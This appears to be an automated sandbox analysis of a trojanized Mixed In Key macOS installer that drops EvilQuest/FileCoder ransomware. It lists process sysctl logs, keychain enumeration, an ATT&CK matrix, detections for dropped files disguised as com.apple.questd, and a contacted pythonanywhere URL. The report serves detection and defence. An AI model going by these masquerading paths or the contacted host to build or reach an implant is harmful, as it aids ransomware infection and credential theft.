Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.395 -> queries PID 395
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.394 -> queries PID 394
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.393 -> queries PID 393
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.382 -> queries PID 382
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.380 -> queries PID 380
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.379 -> queries PID 379
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.378 -> queries PID 378
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.377 -> queries PID 377
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.376 -> queries PID 376
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.375 -> queries PID 375
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.374 -> queries PID 374
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.373 -> queries PID 373
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.372 -> queries PID 372
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.370 -> queries PID 370
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.366 -> queries PID 366
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.365 -> queries PID 365
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.363 -> queries PID 363
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.362 -> queries PID 362
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.361 -> queries PID 361
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.360 -> queries PID 360
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.359 -> queries PID 359
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.358 -> queries PID 358
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.357 -> queries PID 357
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.356 -> queries PID 356
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.355 -> queries PID 355
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.354 -> queries PID 354
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.353 -> queries PID 353
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.352 -> queries PID 352
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.351 -> queries PID 351
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.349 -> queries PID 349
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.347 -> queries PID 347
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.346 -> queries PID 346
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.344 -> queries PID 344
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.343 -> queries PID 343
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.342 -> queries PID 342
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.340 -> queries PID 340
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.338 -> queries PID 338
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.337 -> queries PID 337
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.336 -> queries PID 336
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.335 -> queries PID 335
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.334 -> queries PID 334
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.333 -> queries PID 333
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.329 -> queries PID 329
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.328 -> queries PID 328
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.327 -> queries PID 327
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.326 -> queries PID 326
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.325 -> queries PID 325
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.324 -> queries PID 324
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.323 -> queries PID 323
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.322 -> queries PID 322
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.321 -> queries PID 321
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.320 -> queries PID 320
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.319 -> queries PID 319
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.318 -> queries PID 318
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.317 -> queries PID 317
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.295 -> queries PID 295
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.316 -> queries PID 316
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.314 -> queries PID 314
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.313 -> queries PID 313
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.312 -> queries PID 312
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.311 -> queries PID 311
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.310 -> queries PID 310
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.309 -> queries PID 309
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.307 -> queries PID 307
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.306 -> queries PID 306
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.304 -> queries PID 304

Source: /System/Library/CoreServices/Installer.app/Contents/MacOS/Installer (PID: 611)	Sysctl read request: hw.cpu_freq (6.15)	Jump to behavior
Source: /System/Library/CoreServices/Installer.app/Contents/MacOS/Installer (PID: 611)	Sysctl read request: hw.ncpu (6.3)	Jump to behavior
Source: /System/Library/CoreServices/Installer.app/Contents/MacOS/Installer (PID: 611)	Sysctl read request: hw.memsize (6.24)	Jump to behavior
Source: /System/Library/CoreServices/Installer.app/Contents/MacOS/Installer (PID: 611)	Sysctl read request: hw.availcpu (6.25)	Jump to behavior

Source: /System/Library/CoreServices/Installer.app/Contents/MacOS/Installer (PID: 611)	Sysctl requested: kern.ostype (1.1)	Jump to behavior
Source: /System/Library/CoreServices/Installer.app/Contents/MacOS/Installer (PID: 611)	Sysctl requested: kern.osrelease (1.2)	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.ostype (1.1)
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.osrelease (1.2)
Source: /Library/AppQuest/com.apple.questd (PID: 647)	Sysctl requested: kern.ostype (1.1)
Source: /Library/AppQuest/com.apple.questd (PID: 647)	Sysctl requested: kern.osrelease (1.2)

Source: /System/Library/CoreServices/Installer.app/Contents/MacOS/Installer (PID: 611)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /tmp/PKInstallSandbox.itFDGL/Scripts/com.mixedinkey.installer.tVvVCe/postinstall (PID: 633)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 642)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 643)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 648)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 649)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 652)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 653)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 656)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 657)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 672)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 674)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 680)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 681)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 684)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 685)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 688)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 689)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 692)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 693)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 696)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 697)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 723)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 724)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 731)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 732)	Sysctl requested: kern.hostname (1.10)
Source: /Library/AppQuest/com.apple.questd (PID: 647)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 660)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 661)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 664)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 665)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 668)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 669)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 673)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 677)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 700)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 701)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 704)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 705)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 708)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 709)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 712)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 713)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 716)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 717)	Sysctl requested: kern.hostname (1.10)

Source: /System/Library/CoreServices/Installer.app/Contents/MacOS/Installer (PID: 611)

System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist

Jump to behavior

Stealing of Sensitive Information:

Might steal keychain information which contains credentials

Show sources

Source: /Library/mixednkey/toolroomd (PID: 639)	Keychain directory enumerated: /Users/berri/Library/Keychains
Source: /Library/AppQuest/com.apple.questd (PID: 647)	Keychain directory enumerated: /Users/berri/Library/Keychains

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting1	LC_LOAD_DYLIB Addition1	LC_LOAD_DYLIB Addition1	Disable or Modify Tools1	OS Credential Dumping1	System Information Discovery41	Remote Services	Data from Local System1	Exfiltration Over Other Network Medium	Ingress Tool Transfer3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	User Execution1	Plist Modification1	Plist Modification1	File and Directory Permissions Modification1	Input Capture1	Security Software Discovery1	Remote Desktop Protocol	Input Capture1	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter1	Launch Agent4	Elevated Execution with Prompt1	Scripting1	Keychain1	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Remote Access Software1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	AppleScript3	Launch Daemon3	Sudo and Sudo Caching1	Code Signing1	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Launch Agent4	Elevated Execution with Prompt1	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol4	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Launch Daemon3	Sudo and Sudo Caching1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	File Deletion2	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Masquerading41	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Hidden Files and Directories21	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Shell
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

Source	Detection	Scanner	Label	Link
/Users/berri/Library/AppQuest/com.apple.questd	100%	Avira	OSX/EvilQuest.lqmhg
/Library/AppQuest/com.apple.questd	100%	Avira	OSX/Filecoder.pskpy
/Library/AppQuest/com.apple.questd	3%	Metadefender		Browse
/Library/AppQuest/com.apple.questd	72%	ReversingLabs	MacOS.Trojan.FileCoder
/Users/berri/Library/.b0MbtGgfS	0%	ReversingLabs
/Users/berri/Library/AppQuest/com.apple.questd	62%	ReversingLabs	MacOS.Ransomware.FileCoder
/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/MacOS/.BC.T_KWbM0U	0%	ReversingLabs
/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/MacOS/.BC.T_F9azqT	0%	ReversingLabs
/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/MacOS/.BC.T_nca4zE	0%	ReversingLabs
/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/MacOS/.BC.T_HCcfBJ	0%	ReversingLabs
/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Utils/.BC.T_nXMCY0	3%	Metadefender		Browse
/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Utils/.BC.T_nXMCY0	72%	ReversingLabs	MacOS.Trojan.FileCoder
/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Scripts/com.mixedinkey.installer.tVvVCe/.BC.T_zoBeEL	11%	ReversingLabs	MacOS.Trojan.Generic
/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Scripts/com.mixedinkey.installer.tVvVCe/Scripts/.BC.T_zxKC2r	11%	ReversingLabs	MacOS.Trojan.Generic
/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Scripts/com.mixedinkey.installer.tVvVCe/Utils/.BC.T_EdCtGl	3%	Metadefender		Browse
/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Scripts/com.mixedinkey.installer.tVvVCe/Utils/.BC.T_EdCtGl	72%	ReversingLabs	MacOS.Trojan.FileCoder
/private/var/root/Library/.osPtRL91w	3%	Metadefender		Browse
/private/var/root/Library/.osPtRL91w	72%	ReversingLabs	MacOS.Trojan.FileCoder
/private/var/root/Library/AppQuest/com.apple.questd	3%	Metadefender		Browse
/private/var/root/Library/AppQuest/com.apple.questd	72%	ReversingLabs	MacOS.Trojan.FileCoder

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.platinumnotes.com/?utm_source=mik8_mac&utm_medium=mac&utm_campaign=mik	0%	Avira URL Cloud	safe
http://www.daemonology.net/bsdiff/	0%	Virustotal		Browse
http://www.daemonology.net/bsdiff/	0%	Avira URL Cloud	safe
http://www.platinumnotes.com/?utm_source=mik8_mac&utm_medium=mac&utm_campaign=mik8_mac	0%	Virustotal		Browse
http://www.platinumnotes.com/?utm_source=mik8_mac&utm_medium=mac&utm_campaign=mik8_mac	0%	Avira URL Cloud	safe
http://home.pcisys.net/~melanson/codecs/mp3extensions.txt	0%	Avira URL Cloud	safe
http://www.id3.org/ID3v1	0%	Avira URL Cloud	safe
http://flow8deck.com/?utm_source=mik8_mac&utm_medium=mac&utm_campaign=mik	0%	Avira URL Cloud	safe
http://www.mp3-tech.org/programmer/frame_header.html	0%	Avira URL Cloud	safe
http://www.id3.org/id3v2.4.0-frames	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
andrewka6.pythonanywhere.com	35.173.69.207	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://andrewka6.pythonanywhere.com/ret.txt	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.platinumnotes.com/?utm_source=mik8_mac&utm_medium=mac&utm_campaign=mik	.BC.T_HCcfBJ.291.dr	false	Avira URL Cloud: safe	unknown
https://www.mixedinkey.com	.BC.T_yHpOuA.291.dr	false		high
https://mixedinkey.com/tutorials/mixed-in-key/harmonicMixing101.html	.BC.T_HCcfBJ.291.dr	false		high
https://online5.mixedinkey.com/Services/Analysis/AnalyzeSong	.BC.T_HCcfBJ.291.dr	false		high
http://www.midi.org/techspecs/midimessages.php	.BC.T_IhbC26.291.dr	false		high
http://musicbrainz.org	.BC.T_mx7dic.291.dr	false		high
http://developer.kde.org/~wheeler/taglib/	.BC.T_YLkrs1.291.dr	false		high
https://online5.mixedinkey.com/Services/Analysis/LatestAlgorithmVersionsv32	.BC.T_qhmt0Y.291.dr	false		high
https://news.mixedinkey.com/news?theme=MIK&channels=%	.BC.T_Wq6vpD.291.dr	false		high
http://www.apache.org/licenses/LICENSE-2.0Copyright	.BC.T_r7aTLv.291.dr, .BC.T_T7LfAr.291.dr, .BC.T_dCYuLS.291.dr, .BC.T_YimtvX.291.dr, .BC.T_pdEYlM.291.dr, .BC.T_fMWw4g.291.dr, .BC.T_pnZgQG.291.dr, .BC.T_1N2tbP.291.dr, .BC.T_ihC20x.291.dr, .BC.T_LzwW9f.291.dr, .BC.T_GuNU5P.291.dr, .BC.T_9KYgzf.291.dr	false		high
http://www.apache.org/licenses/LICENSE-2.0RobotoThin	.BC.T_dCYuLS.291.dr, .BC.T_fMWw4g.291.dr	false		high
https://mixedinkey.com/tutorials/mixed-in-key/seratoIntegration.html	.BC.T_HCcfBJ.291.dr	false		high
http://www.mixedinkey.com/Book/?utm_source=mik8_mac&utm_medium=mac&utm_campaign=mik	.BC.T_HCcfBJ.291.dr	false		high
https://github.com/mixedinkey-opensource/MIKMIDI/wiki/Adding-Audio-to-UIBackgroundModes	.BC.T_cYRDEO.291.dr	false		high
https://community.mixedinkey.com/BlogPosts/Categories/News/	.BC.T_HCcfBJ.291.dr	false		high
https://online5.mixedinkey.com/Services/License/CheckLicense	.BC.T_HCcfBJ.291.dr	false		high
https://mixedinkey.com/tutorials/mixed-in-key/abletonIntegration.html	.BC.T_HCcfBJ.291.dr	false		high
https://github.com/mixedinkey-opensource/MIKMIDI/issues/76	.BC.T_syQVRJ.291.dr	false		high
https://www.mixedinkey.com/DownloadMacOSX.aspx?Version=Original&VIP=%	.BC.T_yHpOuA.291.dr	false		high
https://mixedinkey.com/tutorials/mixed-in-key/startHere.html	.BC.T_HCcfBJ.291.dr	false		high
https://online5.mixedinkey.com/Services/Analysis/LatestAlgorithmVersions	.BC.T_qhmt0Y.291.dr	false		high
https://mixedinkey.com/tutorials/mixed-in-key/pioneerIntegration.html	.BC.T_HCcfBJ.291.dr	false		high
https://www.mixedinkey.com/recovery	.BC.T_yHpOuA.291.dr	false		high
http://www.apache.org/licenses/LICENSE-2.0RobotoLight	.BC.T_ihC20x.291.dr, .BC.T_GuNU5P.291.dr	false		high
https://mixedinkey.com/privacy-policy/	.BC.T_QSX9s3.291.dr	false		high
https://github.com/mixedinkey-opensource/MIKMIDI/issues/216	.BC.T_syQVRJ.291.dr	false		high
http://www.apache.org/licenses/LICENSE-2.0	.BC.T_pnZgQG.291.dr, .BC.T_1N2tbP.291.dr, .BC.T_ihC20x.291.dr, .BC.T_LzwW9f.291.dr, .BC.T_GuNU5P.291.dr, .BC.T_9KYgzf.291.dr, .BC.T_oAO95V.291.dr	false		high
https://mail.kde.org/mailman/listinfo/taglib-devel	.BC.T_YLkrs1.291.dr	false		high
http://developer.kde.org/~wheeler/taglib.html	.BC.T_YLkrs1.291.dr	false		high
http://www.apache.org/licenses/	.BC.T_oAO95V.291.dr	false		high
http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html	.BC.T_YLkrs1.291.dr	false		high
https://github.com/mixedinkey-opensource/MIKMIDI/issues/2	.BC.T_Z9xX8s.291.dr	false		high
https://news.mixedinkey.com/api/news/unreadcount?channels=%	.BC.T_Wq6vpD.291.dr	false		high
https://online5.mixedinkey.com/Services/UserFeedback/Feedback	.BC.T_yHpOuA.291.dr	false		high
https://www.mixedinkey.com/BuyMacOSX.aspx?S=App	.BC.T_yHpOuA.291.dr	false		high
http://odesi.mixedinkey.com/?utm_source=mik8_mac&utm_medium=mac&utm_campaign=mik	.BC.T_HCcfBJ.291.dr	false		high
http://www.daemonology.net/bsdiff/	.BC.T_6kMUxA.291.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.midi.org/techspecs/gm1sound.php	.BC.T_w7CuRX.291.dr	false		high
https://builds.mixedinkey.com/appcasts/%ld/%	.BC.T_Sj0766.291.dr	false		high
http://www.apache.org/licenses/LICENSE-2.0RobotoBlack	.BC.T_T7LfAr.291.dr, .BC.T_1N2tbP.291.dr	false		high
https://news.mixedinkey.com/api/news/channels/searchbyvipcode?vipCode=%	.BC.T_Wq6vpD.291.dr	false		high
https://community.mixedinkey.com	.BC.T_HCcfBJ.291.dr	false		high
http://developer.kde.org/~wheeler/taglib/api/	.BC.T_xnUU2w.291.dr	false		high
http://www.apache.org/licenses/LICENSE-2.0RobotoMedium	.BC.T_LzwW9f.291.dr, .BC.T_9KYgzf.291.dr	false		high
https://mikteam.atlassian.net/wiki/display/MT/How	.BC.T_xnUU2w.291.dr	false		high
https://mikteam.fogbugz.com/default.asp?W76	.BC.T_FO3DQw.291.dr	false		high
https://www.MixedInKey.com/PrivacyPolicy	.BC.T_HCcfBJ.291.dr	false		high
https://mixedinkey.com/master-collection/	.BC.T_HCcfBJ.291.dr	false		high
http://www.platinumnotes.com/?utm_source=mik8_mac&utm_medium=mac&utm_campaign=mik8_mac	.BC.T_HCcfBJ.291.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://home.pcisys.net/~melanson/codecs/mp3extensions.txt	.BC.T_pNEyuA.291.dr	false	Avira URL Cloud: safe	unknown
https://mixedinkey.com/tutorials/mixed-in-key/abletonIntegration.htmlhttps://mixedinkey.com/tutorial	.BC.T_HCcfBJ.291.dr	false		high
http://www.id3.org/ID3v1	.BC.T_0xZv2r.291.dr	false	Avira URL Cloud: safe	unknown
https://mixedinkey.com/tutorials/mixed-in-key/traktorIntegration.html	.BC.T_HCcfBJ.291.dr	false		high
http://flow8deck.com/?utm_source=mik8_mac&utm_medium=mac&utm_campaign=mik	.BC.T_HCcfBJ.291.dr	false	Avira URL Cloud: safe	unknown
http://www.midi.org/techspecs/manid.php	.BC.T_jNE5sR.291.dr	false		high
https://mixedinkey.com/tutorials/mixed-in-key/iTunesIntegration.html	.BC.T_HCcfBJ.291.dr	false		high
https://www.MixedInKey.com/downloads.aspx	.BC.T_HCcfBJ.291.dr	false		high
https://www.mixedinkey.com/PrivacyPolicy	.BC.T_HCcfBJ.291.dr	false		high
http://www.mixedinkey.com/	.BC.T_Wq6vpD.291.dr	false		high
http://www.mp3-tech.org/programmer/frame_header.html	.BC.T_4W3rGF.291.dr	false	Avira URL Cloud: safe	unknown
http://mashup.mixedinkey.com/?utm_source=mik8_mac&utm_medium=mac&utm_campaign=mik	.BC.T_HCcfBJ.291.dr	false		high
http://odesi.mixedinkey.com/?utm_source=mik8_mac&utm_medium=mac&utm_campaign=mikhttp://www.platinumn	.BC.T_HCcfBJ.291.dr	false		high
http://www.id3.org/id3v2.4.0-frames	.BC.T_0xZv2r.291.dr	false	Avira URL Cloud: safe	unknown
http://www.xiph.org	.BC.T_WgbOrP.291.dr	false		high

Contacted IPs

No. of IPs < 25%
